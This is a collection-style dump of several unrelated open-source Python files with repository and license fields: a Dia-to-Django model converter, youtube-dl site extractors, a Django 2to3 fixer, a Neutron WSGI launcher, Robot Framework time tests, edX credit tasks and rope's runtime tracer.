tc = "models." + tsd[tc.strip().lower()] + "(" + val + ")"
else:
tc = "models.CharField(max_length=" + varch.group(1) + ")"
if len(val) > 0:
tc = tc.replace(")", ", " + val + " )")
if not (nc == "id" and tc == "AutoField()"):
clases[actclas][2] = clases[actclas][2] + (" %s = %s\n" % (nc, tc))
elif i.getAttribute("type") == "UML - Generalization":
mycons = ['A', 'A']
a = i.getElementsByTagName("dia:connection")
for j in a:
if len(j.getAttribute("to")):
mycons[int(j.getAttribute("handle"))] = j.getAttribute("to")
print(mycons)
if 'A' not in mycons:
herit.append(mycons)
elif i.getAttribute("type") == "UML - SmallPackage":
a = i.getElementsByTagName("dia:string")
for j in a:
if len(j.childNodes[0].data[1:-1]):
imports += six.u("from %s.models import *" % j.childNodes[0].data[1:-1])
addparentstofks(herit, clases)
#Ordering the appearance of classes
#First we make a list of the classes each classs is related to.
ordered = []
for j, k in six.iteritems(clases):
k[2] = k[2] + "\n def %s(self):\n return u\"\"\n" % (("__str__" if six.PY3 else "__unicode__"), )
for fk in k[0]:
if fk not in dependclasses:
clases[fk][3] += 1
ordered.append([j] + k)
i = 0
while i < len(ordered):
mark = i
j = i + 1
while j < len(ordered):
if ordered[i][0] in ordered[j][1]:
mark = j
j += 1
if mark == i:
i += 1
else:
# swap %s in %s" % ( ordered[i] , ordered[mark]) to make ordered[i] to be at the end
if ordered[i][0] in ordered[mark][1] and ordered[mark][0] in ordered[i][1]:
#Resolving simplistic circular ForeignKeys
print("Not able to resolve circular ForeignKeys between %s and %s" % (ordered[i][1], ordered[mark][0]))
break
a = ordered[i]
ordered[i] = ordered[mark]
ordered[mark] = a
if i == len(ordered) - 1:
break
ordered.reverse()
if imports:
models_txt = str(imports)
for i in ordered:
models_txt += '%s\n' % str(i[3])
return models_txt
if __name__ == '__main__':
if len(sys.argv) == 2:
dia2django(sys.argv[1])
else:
print(" Use:\n \n " + sys.argv[0] + " diagram.dia\n\n")
| apache-2.0 |
bastik/youtube-dl | youtube_dl/extractor/academicearth.py | 95 | 1399 | from __future__ import unicode_literals
import re
from .common import InfoExtractor
class AcademicEarthCourseIE(InfoExtractor):
_VALID_URL = r'^https?://(?:www\.)?academicearth\.org/playlists/(?P<id>[^?#/]+)'
IE_NAME = 'AcademicEarth:Course'
_TEST = {
'url': 'http://academicearth.org/playlists/laws-of-nature/',
'info_dict': {
'id': 'laws-of-nature',
'title': 'Laws of Nature',
'description': 'Introduce yourself to the laws of nature with these free online college lectures from Yale, Harvard, and MIT.',
},
'playlist_count': 4,
}
def _real_extract(self, url):
playlist_id = self._match_id(url)
webpage = self._download_webpage(url, playlist_id)
title = self._html_search_regex(
r'<h1 class="playlist-name"[^>]*?>(.*?)</h1>', webpage, 'title')
description = self._html_search_regex(
r'<p class="excerpt"[^>]*?>(.*?)</p>',
webpage, 'description', fatal=False)
urls = re.findall(
r'<li class="lecture-preview">\s*?<a target="_blank" href="([^"]+)">',
webpage)
entries = [self.url_result(u) for u in urls]
return {
'_type': 'playlist',
'id': playlist_id,
'title': title,
'description': description,
'entries': entries,
}
| unlicense |
frederick-masterton/django | django/utils/2to3_fixes/fix_unicode.py | 349 | 1181 | """Fixer for __unicode__ methods.
Uses the django.utils.encoding.python_2_unicode_compatible decorator.
"""
from __future__ import unicode_literals
from lib2to3 import fixer_base
from lib2to3.fixer_util import find_indentation, Name, syms, touch_import
from lib2to3.pgen2 import token
from lib2to3.pytree import Leaf, Node
class FixUnicode(fixer_base.BaseFix):
BM_compatible = True
PATTERN = """
classdef< 'class' any+ ':'
suite< any*
funcdef< 'def' unifunc='__unicode__'
parameters< '(' NAME ')' > any+ >
any* > >
"""
def transform(self, node, results):
unifunc = results["unifunc"]
strfunc = Name("__str__", prefix=unifunc.prefix)
unifunc.replace(strfunc)
klass = node.clone()
klass.prefix = '\n' + find_indentation(node)
decorator = Node(syms.decorator, [Leaf(token.AT, "@"), Name('python_2_unicode_compatible')])
decorated = Node(syms.decorated, [decorator, klass], prefix=node.prefix)
node.replace(decorated)
touch_import('django.utils.encoding', 'python_2_unicode_compatible', decorated)
| bsd-3-clause |
cloudbase/neutron | neutron/server/wsgi_pecan.py | 9 | 1026 | #!/usr/bin/env python
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_log import log
from neutron._i18n import _LI
from neutron.pecan_wsgi import app as pecan_app
from neutron.server import wsgi_eventlet
from neutron import service
LOG = log.getLogger(__name__)
def pecan_wsgi_server():
LOG.info(_LI("Pecan WSGI server starting..."))
application = pecan_app.setup_app()
neutron_api = service.run_wsgi_app(application)
wsgi_eventlet.start_api_and_rpc_workers(neutron_api)
| apache-2.0 |
eric-stanley/robotframework | utest/utils/test_robottime.py | 4 | 17337 | import unittest
import re
import time
import datetime
from robot.utils.asserts import (assert_equal, assert_raises_with_msg,
assert_true, assert_not_none)
from robot.utils.robottime import (timestr_to_secs, secs_to_timestr, get_time,
parse_time, format_time, get_elapsed_time,
get_timestamp, get_start_timestamp,
timestamp_to_secs, elapsed_time_to_string,
_get_timetuple)
EXAMPLE_TIME = time.mktime(datetime.datetime(2007, 9, 20, 16, 15, 14).timetuple())
class TestTime(unittest.TestCase):
def test_get_timetuple_excluding_millis(self):
assert_equal(_get_timetuple(12345)[:-1], time.localtime(12345)[:6])
def test_get_current_timetuple_excluding_millis(self):
while True:
expected = time.localtime()
actual = _get_timetuple()
# make sure got same times and _get_timetuple() did not round millis
if expected == time.localtime() and actual[-1] > 0:
break
assert_equal(actual[:-1], expected[:6])
def test_get_timetuple_millis(self):
assert_equal(_get_timetuple(12345)[-2:], (45, 0))
assert_equal(_get_timetuple(12345.12345)[-2:], (45, 123))
assert_equal(_get_timetuple(12345.67890)[-2:], (45, 679))
assert_equal(_get_timetuple(12345.99999)[-2:], (46, 0))
def test_timestr_to_secs_with_numbers(self):
for inp, exp in [(1, 1),
(42, 42),
(1.1, 1.1),
(3.142, 3.142),
(-1, -1),
(-1.1, -1.1),
(0, 0),
(0.55555, 0.556),
(11.111111, 11.111),
('1e2', 100),
('-1.5e3', -1500)]:
assert_equal(timestr_to_secs(inp), exp, inp)
if not isinstance(inp, basestring):
assert_equal(timestr_to_secs(str(inp)), exp, inp)
def test_timestr_to_secs_with_time_string(self):
for inp, exp in [('1s', 1),
('0 day 1 MINUTE 2 S 42 millis', 62.042),
('1minute 0sec 10 millis', 60.01),
('9 9 secs 5 3 4 m i l l i s e co n d s', 99.534),
('10DAY10H10M10SEC', 900610),
('1day 23h 46min 7s 666ms', 171967.666),
('1.5min 1.5s', 91.5),
('1.5 days', 60*60*36),
('1 day', 60*60*24),
('2 days', 2*60*60*24),
('1 d', 60*60*24),
('1 hour', 60*60),
('3 hours', 3*60*60),
('1 h', 60*60),
('1 minute', 60),
('2 minutes', 2*60),
('1 min', 60),
('2 mins', 2*60),
('1 m', 60),
('1 second', 1),
('2 seconds', 2),
('1 sec', 1),
('2 secs', 2),
('1 s', 1),
('1 millisecond', 0.001),
('2 milliseconds', 0.002),
('1 millisec', 0.001),
('2 millisecs', 0.002),
('1234 millis', 1.234),
('1 msec', 0.001),
('2 msecs', 0.002),
('1 ms', 0.001),
('-1s', -1),
('- 1 min 2 s', -62),
('0.1millis', 0),
('0.5ms', 0.001),
('0day 0hour 0minute 0seconds 0millisecond', 0)]:
assert_equal(timestr_to_secs(inp), exp, inp)
def test_timestr_to_secs_with_timer_string(self):
for inp, exp in [('00:00:00', 0),
('00:00:01', 1),
('01:02:03', 3600 + 2*60 + 3),
('100:00:00', 100*3600),
('1:00:00', 3600),
('11:00:00', 11*3600),
('00:00', 0),
('00:01', 1),
('42:01', 42*60 + 1),
('100:00', 100*60),
('100:100', 100*60 + 100),
('100:100:100', 100*3600 + 100*60 + 100),
('1:1:1', 3600 + 60 + 1),
('0001:0001:0001', 3600 + 60 + 1),
('-00:00:00', 0),
('-00:01:10', -70),
('-1:2:3', -3600 - 2*60 - 3),
('+00:00:00', 0),
('+00:01:10', 70),
('+1:2:3', 3600 + 2*60 + 3),
('00:00:00.0', 0),
('00:00:00.000', 0),
('00:00:00.000000000', 0),
('00:00:00.1', 0.1),
('00:00:00.42', 0.42),
('00:00:00.001', 0.001),
('00:00:00.123', 0.123),
('00:00:00.1234', 0.123),
('00:00:00.12345', 0.123),
('00:00:00.12356', 0.124),
('00:00:00.999', 0.999),
('00:00:00.9995001', 1),
('00:00:00.000000001', 0)]:
assert_equal(timestr_to_secs(inp), exp, inp)
if '.' not in inp:
inp += '.500'
exp += 0.5 if inp[0] != '-' else -0.5
assert_equal(timestr_to_secs(inp), exp, inp)
def test_timestr_to_secs_custom_rounding(self):
secs = 0.123456789
for round_to in 0, 1, 6:
expected = round(secs, round_to)
assert_equal(timestr_to_secs(secs, round_to), expected)
assert_equal(timestr_to_secs(str(secs), round_to), expected)
def test_timestr_to_secs_no_rounding(self):
secs = 0.123456789
assert_equal(timestr_to_secs(secs, round_to=None), secs)
assert_equal(timestr_to_secs(str(secs), round_to=None), secs)
def test_timestr_to_secs_with_invalid(self):
for inv in ['', 'foo', 'foo days', '1sec 42 millis 3', '1min 2w', None]:
assert_raises_with_msg(ValueError, "Invalid time string '%s'." % inv,
timestr_to_secs, inv)
def test_secs_to_timestr(self):
for inp, compact, verbose in [
(0.001, '1ms', '1 millisecond'),
(0.002, '2ms', '2 milliseconds'),
(0.9999, '1s', '1 second'),
(1, '1s', '1 second'),
(1.9999, '2s', '2 seconds'),
(2, '2s', '2 seconds'),
(60, '1min', '1 minute'),
(120, '2min', '2 minutes'),
(3600, '1h', '1 hour'),
(7200, '2h', '2 hours'),
(60*60*24, '1d', '1 day'),
(60*60*48, '2d', '2 days'),
(171967.667, '1d 23h 46min 7s 667ms',
'1 day 23 hours 46 minutes 7 seconds 667 milliseconds'),
(7320, '2h 2min', '2 hours 2 minutes'),
(7210.05, '2h 10s 50ms', '2 hours 10 seconds 50 milliseconds') ,
(11.1111111, '11s 111ms', '11 seconds 111 milliseconds'),
(0.55555555, '556ms', '556 milliseconds'),
(0, '0s', '0 seconds'),
(9999.9999, '2h 46min 40s', '2 hours 46 minutes 40 seconds'),
(10000, '2h 46min 40s', '2 hours 46 minutes 40 seconds'),
(-1, '- 1s', '- 1 second'),
(-171967.667, '- 1d 23h 46min 7s 667ms',
'- 1 day 23 hours 46 minutes 7 seconds 667 milliseconds')]:
assert_equal(secs_to_timestr(inp, compact=True), compact, inp)
assert_equal(secs_to_timestr(inp), verbose, inp)
def test_format_time(self):
timetuple = (2005, 11, 2, 14, 23, 12, 123)
for seps, exp in [(('-',' ',':'), '2005-11-02 14:23:12'),
(('', '-', ''), '20051102-142312'),
(('-',' ',':','.'), '2005-11-02 14:23:12.123')]:
assert_equal(format_time(timetuple, *seps), exp)
def test_get_timestamp(self):
for seps, pattern in [((), '^\d{8} \d\d:\d\d:\d\d.\d\d\d$'),
(('',' ',':',None), '^\d{8} \d\d:\d\d:\d\d$'),
(('','','',None), '^\d{14}$'),
(('-',' ',':',';'),
'^\d{4}-\d\d-\d\d \d\d:\d\d:\d\d;\d\d\d$')]:
ts = get_timestamp(*seps)
assert_not_none(re.search(pattern, ts),
"'%s' didn't match '%s'" % (ts, pattern), False)
def test_get_start_timestamp(self):
start = get_start_timestamp(millissep='.')
time.sleep(0.002)
assert_equal(get_start_timestamp(millissep='.'), start)
def test_timestamp_to_secs_with_default(self):
assert_equal(timestamp_to_secs('20070920 16:15:14.123'), EXAMPLE_TIME+0.123)
def test_timestamp_to_secs_with_seps(self):
result = timestamp_to_secs('2007-09-20#16x15x14M123', ('-','#','x','M'))
assert_equal(result, EXAMPLE_TIME+0.123)
def test_timestamp_to_secs_with_millis(self):
result = timestamp_to_secs('20070920 16:15:14.123')
assert_equal(result, EXAMPLE_TIME+0.123)
def test_get_elapsed_time(self):
starttime = '20060526 14:01:10.500'
for endtime, expected in [('20060526 14:01:10.500', 0),
('20060526 14:01:10.500',0),
('20060526 14:01:10.501', 1),
('20060526 14:01:10.777', 277),
('20060526 14:01:11.000', 500),
('20060526 14:01:11.321', 821),
('20060526 14:01:11.499', 999),
('20060526 14:01:11.500', 1000),
('20060526 14:01:11.501', 1001),
('20060526 14:01:11.000', 500),
('20060526 14:01:11.500', 1000),
('20060526 14:01:11.510', 1010),
('20060526 14:01:11.512',1012),
('20060601 14:01:10.499', 518399999),
('20060601 14:01:10.500', 518400000),
('20060601 14:01:10.501', 518400001)]:
actual = get_elapsed_time(starttime, endtime)
assert_equal(actual, expected, endtime)
def test_get_elapsed_time_negative(self):
starttime = '20060526 14:01:10.500'
for endtime, expected in [('20060526 14:01:10.499', -1),
('20060526 14:01:10.000', -500),
('20060526 14:01:09.900', -600),
('20060526 14:01:09.501', -999),
('20060526 14:01:09.500', -1000),
('20060526 14:01:09.499', -1001)]:
actual = get_elapsed_time(starttime, endtime)
assert_equal(actual, expected, endtime)
def test_elapsed_time_to_string(self):
for elapsed, expected in [(0, '00:00:00.000'),
(0.1, '00:00:00.000'),
(0.49999, '00:00:00.000'),
(0.5, '00:00:00.001'),
(1, '00:00:00.001'),
(42, '00:00:00.042'),
(999, '00:00:00.999'),
(999.9, '00:00:01.000'),
(1000, '00:00:01.000'),
(1001, '00:00:01.001'),
(60000, '00:01:00.000'),
(600000, '00:10:00.000'),
(654321, '00:10:54.321'),
(660000, '00:11:00.000'),
(3600000, '01:00:00.000'),
(36000000, '10:00:00.000'),
(360000000, '100:00:00.000'),
(360000000 + 36000000 + 3600000 +
660000 + 11111, '111:11:11.111')]:
assert_equal(elapsed_time_to_string(elapsed), expected, elapsed)
if expected != '00:00:00.000':
assert_equal(elapsed_time_to_string(-1 * elapsed),
'-' + expected, elapsed)
def test_elapsed_time_to_string_without_millis(self):
for elapsed, expected in [(0, '00:00:00'),
(1, '00:00:00'),
(499, '00:00:00'),
(499.999, '00:00:00'),
(500, '00:00:01'),
(999, '00:00:01'),
(1000, '00:00:01'),
(1499, '00:00:01'),
(59499.9, '00:00:59'),
(59500.0, '00:01:00'),
(59999, '00:01:00'),
(60000, '00:01:00'),
(654321, '00:10:54'),
(654500, '00:10:55'),
(3599999, '01:00:00'),
(3600000, '01:00:00'),
(359999999, '100:00:00'),
(360000000, '100:00:00'),
(360000500, '100:00:01')]:
assert_equal(elapsed_time_to_string(elapsed, include_millis=False),
expected, elapsed)
if expected != '00:00:00':
assert_equal(elapsed_time_to_string(-1 * elapsed, False),
'-' + expected, elapsed)
def test_parse_time_with_valid_times(self):
for input, expected in [('100', 100),
('2007-09-20 16:15:14', EXAMPLE_TIME),
('20070920 161514', EXAMPLE_TIME)]:
assert_equal(parse_time(input), expected)
def test_parse_time_with_now_and_utc(self):
for input, adjusted in [('now', 0),
('NOW', 0),
('Now', 0),
('now+100seconds', 100),
('now - 100 seconds ', -100),
('now + 1 day 100 seconds', 86500),
('now - 1 day 100 seconds', -86500),
('now + 1day 10hours 1minute 10secs', 122470),
('NOW - 1D 10H 1MIN 10S', -122470)]:
expected = get_time('epoch') + adjusted
parsed = parse_time(input)
assert_true(expected <= parsed <= expected + 1),
parsed = parse_time(input.upper().replace('NOW', 'UtC'))
zone = time.altzone if time.localtime().tm_isdst else time.timezone
expected += zone
assert_true(expected <= parsed <= expected + 1),
def test_parse_modified_time_with_invalid_times(self):
for value, msg in [("-100", "Epoch time must be positive (got -100)"),
("YYYY-MM-DD hh:mm:ss",
"Invalid time format 'YYYY-MM-DD hh:mm:ss'"),
("now + foo", "Invalid time string 'foo'."),
("now - 2a ", "Invalid time string '2a'."),
("now+", "Invalid time string ''."),
("nowadays", "Invalid time format 'nowadays'")]:
assert_raises_with_msg(ValueError, msg, parse_time, value)
def test_parse_time_and_get_time_must_round_seconds_down(self):
# Rounding to closest second, instead of rounding down, could give
# times that are greater then e.g. timestamps of files created
# afterwards.
self._verify_parse_time_and_get_time_rounding()
time.sleep(0.5)
self._verify_parse_time_and_get_time_rounding()
def _verify_parse_time_and_get_time_rounding(self):
secs = lambda: int(time.time()) % 60
start_secs = secs()
gt_result = get_time()[-2:]
pt_result = parse_time('NOW') % 60
# Check that seconds have not changed during test
if secs() == start_secs:
assert_equal(gt_result, '%02d' % start_secs)
assert_equal(pt_result, start_secs)
def test_get_timestamp_without_millis(self):
# Need to test twice to verify also possible cached timestamp
assert_true(re.match('\d{8} \d\d:\d\d:\d\d', get_timestamp(millissep=None)))
assert_true(re.match('\d{8} \d\d:\d\d:\d\d', get_timestamp(millissep=None)))
if __name__ == "__main__":
unittest.main()
| apache-2.0 |
shanglt/youtube-dl | youtube_dl/extractor/laola1tv.py | 122 | 3030 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
import random
import re
from .common import InfoExtractor
from ..utils import (
ExtractorError,
xpath_text,
)
class Laola1TvIE(InfoExtractor):
_VALID_URL = r'https?://(?:www\.)?laola1\.tv/(?P<lang>[a-z]+)-(?P<portal>[a-z]+)/.*?/(?P<id>[0-9]+)\.html'
_TEST = {
'url': 'http://www.laola1.tv/de-de/video/straubing-tigers-koelner-haie/227883.html',
'info_dict': {
'id': '227883',
'ext': 'mp4',
'title': 'Straubing Tigers - Kölner Haie',
'categories': ['Eishockey'],
'is_live': False,
},
'params': {
'skip_download': True,
}
}
def _real_extract(self, url):
mobj = re.match(self._VALID_URL, url)
video_id = mobj.group('id')
lang = mobj.group('lang')
portal = mobj.group('portal')
webpage = self._download_webpage(url, video_id)
iframe_url = self._search_regex(
r'<iframe[^>]*?class="main_tv_player"[^>]*?src="([^"]+)"',
webpage, 'iframe URL')
iframe = self._download_webpage(
iframe_url, video_id, note='Downloading iframe')
flashvars_m = re.findall(
r'flashvars\.([_a-zA-Z0-9]+)\s*=\s*"([^"]*)";', iframe)
flashvars = dict((m[0], m[1]) for m in flashvars_m)
partner_id = self._search_regex(
r'partnerid\s*:\s*"([^"]+)"', iframe, 'partner id')
xml_url = ('http://www.laola1.tv/server/hd_video.php?' +
'play=%s&partner=%s&portal=%s&v5ident=&lang=%s' % (
video_id, partner_id, portal, lang))
hd_doc = self._download_xml(xml_url, video_id)
title = xpath_text(hd_doc, './/video/title', fatal=True)
flash_url = xpath_text(hd_doc, './/video/url', fatal=True)
uploader = xpath_text(hd_doc, './/video/meta_organistation')
is_live = xpath_text(hd_doc, './/video/islive') == 'true'
categories = xpath_text(hd_doc, './/video/meta_sports')
if categories:
categories = categories.split(',')
ident = random.randint(10000000, 99999999)
token_url = '%s&ident=%s&klub=0&unikey=0×tamp=%s&auth=%s' % (
flash_url, ident, flashvars['timestamp'], flashvars['auth'])
token_doc = self._download_xml(
token_url, video_id, note='Downloading token')
token_attrib = token_doc.find('.//token').attrib
if token_attrib.get('auth') in ('blocked', 'restricted'):
raise ExtractorError(
'Token error: %s' % token_attrib.get('comment'), expected=True)
video_url = '%s?hdnea=%s&hdcore=3.2.0' % (
token_attrib['url'], token_attrib['auth'])
return {
'id': video_id,
'is_live': is_live,
'title': title,
'url': video_url,
'uploader': uploader,
'categories': categories,
'ext': 'mp4',
}
| unlicense |
shurihell/testasia | openedx/core/djangoapps/credit/tasks.py | 60 | 7836 | """
This file contains celery tasks for credit course views.
"""
from celery import task
from celery.utils.log import get_task_logger
from django.conf import settings
from opaque_keys import InvalidKeyError
from opaque_keys.edx.keys import CourseKey, UsageKey
from openedx.core.djangoapps.credit.api import set_credit_requirements
from openedx.core.djangoapps.credit.exceptions import InvalidCreditRequirements
from openedx.core.djangoapps.credit.models import CreditCourse
from openedx.core.djangoapps.credit.utils import get_course_blocks
from xmodule.modulestore.django import modulestore
from xmodule.modulestore.exceptions import ItemNotFoundError
LOGGER = get_task_logger(__name__)
# XBlocks that can be added as credit requirements
CREDIT_REQUIREMENT_XBLOCK_CATEGORIES = [
"edx-reverification-block",
]
# pylint: disable=not-callable
@task(default_retry_delay=settings.CREDIT_TASK_DEFAULT_RETRY_DELAY, max_retries=settings.CREDIT_TASK_MAX_RETRIES)
def update_credit_course_requirements(course_id): # pylint: disable=invalid-name
"""
Updates course requirements table for a course.
Args:
course_id(str): A string representation of course identifier
Returns:
None
"""
try:
course_key = CourseKey.from_string(course_id)
is_credit_course = CreditCourse.is_credit_course(course_key)
if is_credit_course:
requirements = _get_course_credit_requirements(course_key)
set_credit_requirements(course_key, requirements)
except (InvalidKeyError, ItemNotFoundError, InvalidCreditRequirements) as exc:
LOGGER.error('Error on adding the requirements for course %s - %s', course_id, unicode(exc))
raise update_credit_course_requirements.retry(args=[course_id], exc=exc)
else:
LOGGER.info('Requirements added for course %s', course_id)
def _get_course_credit_requirements(course_key):
"""
Returns the list of credit requirements for the given course.
This will also call into the edx-proctoring subsystem to also
produce proctored exam requirements for credit bearing courses
It returns the minimum_grade_credit and also the ICRV checkpoints
if any were added in the course
Args:
course_key (CourseKey): Identifier for the course.
Returns:
List of credit requirements (dictionaries)
"""
credit_xblock_requirements = _get_credit_course_requirement_xblocks(course_key)
min_grade_requirement = _get_min_grade_requirement(course_key)
proctored_exams_requirements = _get_proctoring_requirements(course_key)
block_requirements = credit_xblock_requirements + proctored_exams_requirements
# sort credit requirements list based on start date and put all the
# requirements with no start date at the end of requirement list.
sorted_block_requirements = sorted(
block_requirements, key=lambda x: (x['start_date'] is None, x['start_date'], x['display_name'])
)
credit_requirements = (
min_grade_requirement + sorted_block_requirements
)
return credit_requirements
def _get_min_grade_requirement(course_key):
"""
Get list of 'minimum_grade_credit' requirement for the given course.
Args:
course_key (CourseKey): Identifier for the course.
Returns:
The list of minimum_grade_credit requirements
"""
course = modulestore().get_course(course_key, depth=0)
try:
return [
{
"namespace": "grade",
"name": "grade",
"display_name": "Minimum Grade",
"criteria": {
"min_grade": course.minimum_grade_credit
},
}
]
except AttributeError:
LOGGER.error("The course %s does not has minimum_grade_credit attribute", unicode(course.id))
else:
return []
def _get_credit_course_requirement_xblocks(course_key): # pylint: disable=invalid-name
"""Generate a course structure dictionary for the specified course.
Args:
course_key (CourseKey): Identifier for the course.
Returns:
The list of credit requirements xblocks dicts
"""
requirements = []
# Retrieve all XBlocks from the course that we know to be credit requirements.
# For performance reasons, we look these up by their "category" to avoid
# loading and searching the entire course tree.
for category in CREDIT_REQUIREMENT_XBLOCK_CATEGORIES:
requirements.extend([
{
"namespace": block.get_credit_requirement_namespace(),
"name": block.get_credit_requirement_name(),
"display_name": block.get_credit_requirement_display_name(),
'start_date': block.start,
"criteria": {},
}
for block in _get_xblocks(course_key, category)
if _is_credit_requirement(block)
])
return requirements
def _get_xblocks(course_key, category):
"""
Retrieve all XBlocks in the course for a particular category.
Returns only XBlocks that are published and haven't been deleted.
"""
xblocks = get_course_blocks(course_key, category)
return xblocks
def _is_credit_requirement(xblock):
"""
Check if the given XBlock is a credit requirement.
Args:
xblock(XBlock): The given XBlock object
Returns:
True if XBlock is a credit requirement else False
"""
required_methods = [
"get_credit_requirement_namespace",
"get_credit_requirement_name",
"get_credit_requirement_display_name"
]
for method_name in required_methods:
if not callable(getattr(xblock, method_name, None)):
LOGGER.error(
"XBlock %s is marked as a credit requirement but does not "
"implement %s", unicode(xblock), method_name
)
return False
return True
def _get_proctoring_requirements(course_key):
"""
Will return list of requirements regarding any exams that have been
marked as proctored exams. For credit-bearing courses, all
proctored exams must be validated and confirmed from a proctoring
standpoint. The passing grade on an exam is not enough.
Args:
course_key: The key of the course in question
Returns:
list of requirements dictionary, one per active proctored exam
"""
# Note: Need to import here as there appears to be
# a circular reference happening when launching Studio
# process
from edx_proctoring.api import get_all_exams_for_course
requirements = []
for exam in get_all_exams_for_course(unicode(course_key)):
if exam['is_proctored'] and exam['is_active'] and not exam['is_practice_exam']:
try:
usage_key = UsageKey.from_string(exam['content_id'])
proctor_block = modulestore().get_item(usage_key)
except (InvalidKeyError, ItemNotFoundError):
LOGGER.info("Invalid content_id '%s' for proctored block '%s'", exam['content_id'], exam['exam_name'])
proctor_block = None
if proctor_block:
requirements.append(
{
'namespace': 'proctored_exam',
'name': exam['content_id'],
'display_name': exam['exam_name'],
'start_date': proctor_block.start if proctor_block.start else None,
'criteria': {},
})
if requirements:
log_msg = (
'Registering the following as \'proctored_exam\' credit requirements: {log_msg}'.format(
log_msg=requirements
)
)
LOGGER.info(log_msg)
return requirements
| agpl-3.0 |
justyns/emacs-for-python | python-libs/rope/base/oi/runmod.py | 32 | 7600 |
def __rope_start_everything():
import os
import sys
import socket
import cPickle as pickle
import marshal
import inspect
import types
import threading
class _MessageSender(object):
def send_data(self, data):
pass
class _SocketSender(_MessageSender):
def __init__(self, port):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('127.0.0.1', port))
self.my_file = s.makefile('w')
def send_data(self, data):
if not self.my_file.closed:
pickle.dump(data, self.my_file)
def close(self):
self.my_file.close()
class _FileSender(_MessageSender):
def __init__(self, file_name):
self.my_file = open(file_name, 'wb')
def send_data(self, data):
if not self.my_file.closed:
marshal.dump(data, self.my_file)
def close(self):
self.my_file.close()
def _cached(func):
cache = {}
def newfunc(self, arg):
if arg in cache:
return cache[arg]
result = func(self, arg)
cache[arg] = result
return result
return newfunc
class _FunctionCallDataSender(object):
def __init__(self, send_info, project_root):
self.project_root = project_root
if send_info.isdigit():
self.sender = _SocketSender(int(send_info))
else:
self.sender = _FileSender(send_info)
def global_trace(frame, event, arg):
# HACK: Ignoring out->in calls
# This might lose some information
if self._is_an_interesting_call(frame):
return self.on_function_call
sys.settrace(global_trace)
threading.settrace(global_trace)
def on_function_call(self, frame, event, arg):
if event != 'return':
return
args = []
returned = ('unknown',)
code = frame.f_code
for argname in code.co_varnames[:code.co_argcount]:
try:
args.append(self._object_to_persisted_form(frame.f_locals[argname]))
except (TypeError, AttributeError):
args.append(('unknown',))
try:
returned = self._object_to_persisted_form(arg)
except (TypeError, AttributeError):
pass
try:
data = (self._object_to_persisted_form(frame.f_code),
tuple(args), returned)
self.sender.send_data(data)
except (TypeError):
pass
return self.on_function_call
def _is_an_interesting_call(self, frame):
#if frame.f_code.co_name in ['?', '<module>']:
# return False
#return not frame.f_back or not self._is_code_inside_project(frame.f_back.f_code)
if not self._is_code_inside_project(frame.f_code) and \
(not frame.f_back or not self._is_code_inside_project(frame.f_back.f_code)):
return False
return True
def _is_code_inside_project(self, code):
source = self._path(code.co_filename)
return source is not None and os.path.exists(source) and \
_realpath(source).startswith(self.project_root)
@_cached
def _get_persisted_code(self, object_):
source = self._path(object_.co_filename)
if not os.path.exists(source):
raise TypeError('no source')
return ('defined', _realpath(source), str(object_.co_firstlineno))
@_cached
def _get_persisted_class(self, object_):
try:
return ('defined', _realpath(inspect.getsourcefile(object_)),
object_.__name__)
except (TypeError, AttributeError):
return ('unknown',)
def _get_persisted_builtin(self, object_):
if isinstance(object_, (str, unicode)):
return ('builtin', 'str')
if isinstance(object_, list):
holding = None
if len(object_) > 0:
holding = object_[0]
return ('builtin', 'list', self._object_to_persisted_form(holding))
if isinstance(object_, dict):
keys = None
values = None
if len(object_) > 0:
keys = object_.keys()[0]
values = object_[keys]
return ('builtin', 'dict',
self._object_to_persisted_form(keys),
self._object_to_persisted_form(values))
if isinstance(object_, tuple):
objects = []
if len(object_) < 3:
for holding in object_:
objects.append(self._object_to_persisted_form(holding))
else:
objects.append(self._object_to_persisted_form(object_[0]))
return tuple(['builtin', 'tuple'] + objects)
if isinstance(object_, set):
holding = None
if len(object_) > 0:
for o in object_:
holding = o
break
return ('builtin', 'set', self._object_to_persisted_form(holding))
return ('unknown',)
def _object_to_persisted_form(self, object_):
if object_ is None:
return ('none',)
if isinstance(object_, types.CodeType):
return self._get_persisted_code(object_)
if isinstance(object_, types.FunctionType):
return self._get_persisted_code(object_.func_code)
if isinstance(object_, types.MethodType):
return self._get_persisted_code(object_.im_func.func_code)
if isinstance(object_, types.ModuleType):
return self._get_persisted_module(object_)
if isinstance(object_, (str, unicode, list, dict, tuple, set)):
return self._get_persisted_builtin(object_)
if isinstance(object_, (types.TypeType, types.ClassType)):
return self._get_persisted_class(object_)
return ('instance', self._get_persisted_class(type(object_)))
@_cached
def _get_persisted_module(self, object_):
path = self._path(object_.__file__)
if path and os.path.exists(path):
return ('defined', _realpath(path))
return ('unknown',)
def _path(self, path):
if path.endswith('.pyc'):
path = path[:-1]
if path.endswith('.py'):
return path
def close(self):
self.sender.close()
def _realpath(path):
return os.path.realpath(os.path.abspath(os.path.expanduser(path)))
send_info = sys.argv[1]
project_root = sys.argv[2]
file_to_run = sys.argv[3]
run_globals = globals()
run_globals.update({'__name__': '__main__',
'__builtins__': __builtins__,
'__file__': file_to_run})
if send_info != '-':
data_sender = _FunctionCallDataSender(send_info, project_root)
del sys.argv[1:4]
execfile(file_to_run, run_globals)
if send_info != '-':
data_sender.close()
if __name__ == '__main__':
__rope_start_everything()
| gpl-3.0 |
tsdmgz/ansible | lib/ansible/plugins/connection/local.py | 73 | 6815 | # (c) 2012, Michael DeHaan <[email protected]>
# (c) 2015, 2017 Toshio Kuratomi <[email protected]>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
from __future__ import (absolute_import, division, print_function)
